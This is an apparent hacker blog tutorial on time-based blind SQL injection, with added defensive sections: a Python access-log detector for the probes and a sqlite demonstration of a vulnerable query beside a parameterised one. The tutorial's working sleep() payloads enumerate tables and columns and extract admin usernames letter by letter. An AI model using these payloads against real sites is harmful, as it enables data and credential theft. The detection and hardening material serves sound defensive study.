2015-03-19

Blind injection exploitation with simple payloads


Pranaam to all bhai ji _/\_

Today I am going to share simple Blind SQL Injection payloads.

These payloads are easy and simple to understand :)

For finding database version
============================
------> If database version is 5 or above

and (select sleep(20) from dual where (SELECT version()) like '5%')--+
If the vulnerable website's database version is 5 or above, the database will sleep for 20 seconds and the page will respond after 20 seconds.

------> If database version is 4 (below 5)

and (select sleep(20) from dual where (SELECT version()) like '4%')--+
If the vulnerable website's database version is 4 (below 5), the page will load after 20 seconds.

For finding Table Name
======================
------> Payload is
and (select sleep(20) from dual where 5* (SELECT table_name FROM information_schema.tables WHERE table_name LIKE 'starting_letters_of_table_name%' LIMIT 0,1)='')

OK, in the above payload you just need to keep guessing the letters of the table name and put them in place of 'starting_letters_of_table_name'.
For example, the website's first table name is admin, so I will guess the first letter and put 'a'.
The payload will then look like this:

and (select sleep(20) from dual where 5* (SELECT table_name FROM information_schema.tables WHERE table_name LIKE 'a%' LIMIT 0,1)='')

If you guessed the first letter correctly, the page will load after 20 seconds; otherwise it will load without any delay.
So now guess the next letter: we put 'd' after the first letter (a), so the payload becomes:

and (select sleep(20) from dual where 5* (SELECT table_name FROM information_schema.tables WHERE table_name LIKE 'ad%' LIMIT 0,1)='')

Like this we keep guessing until we get the whole table name. After that, to extract the next table name, change the LIMIT value from 0,1 to 1,1.
This is how we get the table names.
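From the defender's side, the probes above leave a very recognisable trail in the web server's access log: a request whose query string carries sleep(), information_schema and a LIKE 'x%' prefix, and whose response time jumps from milliseconds to the sleep value. The script below is an added example, not part of the original post, and runs over constructed sample log lines (a common-log-format line with the request time in seconds appended as the last field, which is an assumption about the log layout). It flags those indicators per client, records the prefixes that were tested so an incident responder can see what was being enumerated, and marks a probe as "delay-confirmed" when the sleep() payload coincided with a slow response, which means the injected SQL really executed. The same patterns cover the column-name and data payloads further down this post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real server). Format: common log
# format with the request time in seconds appended as the last field. One client sends
# a normal request, then the version probe and two table-name probes from this post.
SAMPLE_LOG = """\
10.0.0.7 - - [19/Mar/2015:10:01:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4321 0.031
10.0.0.7 - - [19/Mar/2015:10:01:09 +0000] "GET /news.php?id=5+and+(select+sleep(20)+from+dual+where(SELECT+version())+like+%275%25%27)--%2B HTTP/1.1" 200 4321 20.044
10.0.0.7 - - [19/Mar/2015:10:01:40 +0000] "GET /news.php?id=5+and+(select+sleep(20)+from+dual+where+5*+(SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+LIKE+%27a%25%27+LIMIT+0,1)%3D%27%27) HTTP/1.1" 200 4321 20.051
10.0.0.7 - - [19/Mar/2015:10:02:05 +0000] "GET /news.php?id=5+and+(select+sleep(20)+from+dual+where+5*+(SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+LIKE+%27ad%25%27+LIMIT+0,1)%3D%27%27) HTTP/1.1" 200 4321 20.048
192.168.1.20 - - [19/Mar/2015:10:02:10 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4100 0.028
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+) (?P<secs>[\d.]+)$'
)

# sleep() is the function used on this page; benchmark() is MySQL's other common stalling function.
TIME_FUNC_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
SCHEMA_RE = re.compile(r'\binformation_schema\.(tables|columns)\b', re.I)
# LIKE 'prefix%' is the letter-by-letter guess; the captured group is the prefix being tested.
PREFIX_RE = re.compile(r"\blike\s*'([^']*)%'", re.I)


def parse_line(line):
    """Return a dict with ip, secs and the URL-decoded query string, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    rec["query"] = unquote_plus(rec["target"].partition("?")[2])
    return rec


def classify(query):
    """Set of indicator names found in one decoded query string (empty for benign input)."""
    signals = set()
    if TIME_FUNC_RE.search(query):
        signals.add("time-delay-function")
    if SCHEMA_RE.search(query):
        signals.add("schema-enumeration")
    if PREFIX_RE.search(query):
        signals.add("prefix-inference")
    return signals


def analyze(log_text, slow_seconds=5.0):
    """Per-client summary: number of probes, indicators seen, and the prefixes that were tested.

    A probe that carries sleep() AND took longer than slow_seconds means the injected SQL
    actually executed on the server: the endpoint is confirmed vulnerable, not merely attacked.
    """
    report = defaultdict(lambda: {
        "requests": 0, "probes": 0, "max_secs": 0.0,
        "signals": set(), "guessed_prefixes": [],
    })
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ip"]]
        entry["requests"] += 1
        entry["max_secs"] = max(entry["max_secs"], rec["secs"])
        signals = classify(rec["query"])
        if not signals:
            continue
        entry["probes"] += 1
        entry["signals"] |= signals
        m = PREFIX_RE.search(rec["query"])
        if m:
            entry["guessed_prefixes"].append(m.group(1))
        if "time-delay-function" in signals and rec["secs"] >= slow_seconds:
            entry["signals"].add("delay-confirmed")
    return dict(report)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["probes"], "probes,", sorted(entry["signals"]), entry["guessed_prefixes"])
```

The growing prefix list ('5', then 'a', then 'ad') is the signature of the guess-one-letter-at-a-time loop this post describes, and "delay-confirmed" is the finding that turns an attempted-attack ticket into a vulnerability ticket: the application passed attacker-controlled SQL to the database and waited for sleep() to return.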

For finding Column Name
=======================
------> Payload is
and (select sleep(20) from dual where 5* (SELECT column_name FROM information_schema.columns WHERE table_name='our_table_name' and column_name like 'guess_column_name%' LIMIT 0,1)='')

In the above payload we extract the first column name of a table we specify, so first replace our_table_name with the table from which you want to extract column names.
For example, I got the table name 'admin' and now I am looking for the column names inside this table, so I replace our_table_name with admin and then start guessing the column name.
Let's suppose the column name is 'username'; we guess the first letter, and the payload is

and (select sleep(20) from dual where 5* (SELECT column_name FROM information_schema.columns WHERE table_name='admin' and column_name like 'some_letter%' LIMIT 0,1)='')

After putting in the letter it becomes:

and (select sleep(20) from dual where 5* (SELECT column_name FROM information_schema.columns WHERE table_name='admin' and column_name like 'u%' LIMIT 0,1)='')

So if you guessed the letter correctly, the page will load with a 20 second delay.
If you guessed the letter correctly, go for the next letter and try to guess it :)

At last, when we have the full column name, our payload will look like this:

and (select sleep(20) from dual where 5* (SELECT column_name FROM information_schema.columns WHERE table_name='admin' and column_name like 'username%' LIMIT 0,1)='')

The page will load with a delay of 20 seconds, confirming that our first column name is username.
To guess the next column name, change the value of the LIMIT clause from 0,1 to 1,1 and start guessing column letters again.

Getting data from column
========================

OK, once we have the table name as well as the column name, we extract the data from the column.

------> Payload will be

and (select sleep(20) from dual where (SELECT our_column_name FROM our_table_name LIMIT 0,1) like 'guessed value%')

Let's suppose our table name is admin and the column name is username, so we replace our_column_name with the column name 'username' and our_table_name with the table name 'admin',
and start guessing the data value inside the column.
For example, let's assume the username is admin: when we put the letter 'a' in place of guessed value, the page will load with a 20 second delay :)

and (select sleep(20) from dual where (SELECT username FROM admin LIMIT 0,1) like 'a%')

Once you have the first letter, guess the next one; when your payload has the combination 'ad' in place of guessed_value, the page will load with a 20 second delay,
like this:

and (select sleep(20) from dual where (SELECT username FROM admin LIMIT 0,1) like 'ad%')

So we keep guessing until we get the complete value, and once the complete value of the data inside the column is guessed, the page will load with a delay of 20 seconds :)

So that was about simple time-based blind SQL injections.
Hope you liked it.
Take care
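Every payload on this page works for the same reason: the application pastes the id parameter straight into the SQL text, so the attacker's "and (select ...)" suffix becomes part of the WHERE clause and the database evaluates it. The example below is added here and is not the post's own code; it uses an in-memory sqlite3 database (a constructed stand-in for the site's MySQL backend; sqlite has no sleep() or dual, so the oracle is "row or no row" instead of a 20 second delay) to show a vulnerable lookup beside its hardened form. With the vulnerable function, a correct prefix guess and a wrong one produce different results, which is the leak the whole post relies on; with type validation plus a bound parameter, both inputs are rejected identically and no information flows back.

```python
import sqlite3


def setup_db():
    """Constructed in-memory database standing in for the site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (5, 'welcome')")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'not-a-real-hash')")
    return conn


def fetch_title_vulnerable(conn, raw_id):
    # The input is concatenated into the SQL text, so a suffix such as
    # "5 and (select ...)" becomes part of the WHERE clause and is evaluated.
    sql = "SELECT title FROM news WHERE id=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def fetch_title_hardened(conn, raw_id):
    # Validate the type first, then bind the value; the SQL text never changes,
    # so the database only ever sees an integer compared with the id column.
    try:
        news_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM news WHERE id=?", (news_id,)).fetchone()
    return row[0] if row else None


# Constructed inputs mirroring the structure of the page's data-extraction payload:
# the first guess matches the stored username ('admin'), the second does not.
CORRECT_GUESS = "5 and (select 1 from admin where username like 'a%')"
WRONG_GUESS = "5 and (select 1 from admin where username like 'x%')"


def oracle_leaks(fetch):
    """True if a correct and a wrong guess are distinguishable through the given lookup."""
    conn = setup_db()
    return fetch(conn, CORRECT_GUESS) != fetch(conn, WRONG_GUESS)


if __name__ == "__main__":
    print("vulnerable lookup leaks:", oracle_leaks(fetch_title_vulnerable))  # True
    print("hardened lookup leaks:  ", oracle_leaks(fetch_title_hardened))    # False
```

The hardened function combines two independent defences: the int() conversion rejects anything that is not a plain number before the database is involved, and the ? placeholder guarantees that even a value which passes validation is sent as data, never spliced into the statement. Either one alone stops the payloads on this page; together they also stop the variants that a single check might miss.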


-==[[Love to]]==--
zero Cool ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,AR AR,Hackuin,Mannu, ViKi, Hardeep singh, Bhuppi,Mohit, Ffe,  RR Mam, Jagriti, DON and bikash dash
© 2009 Start With Linux | Mannu Linux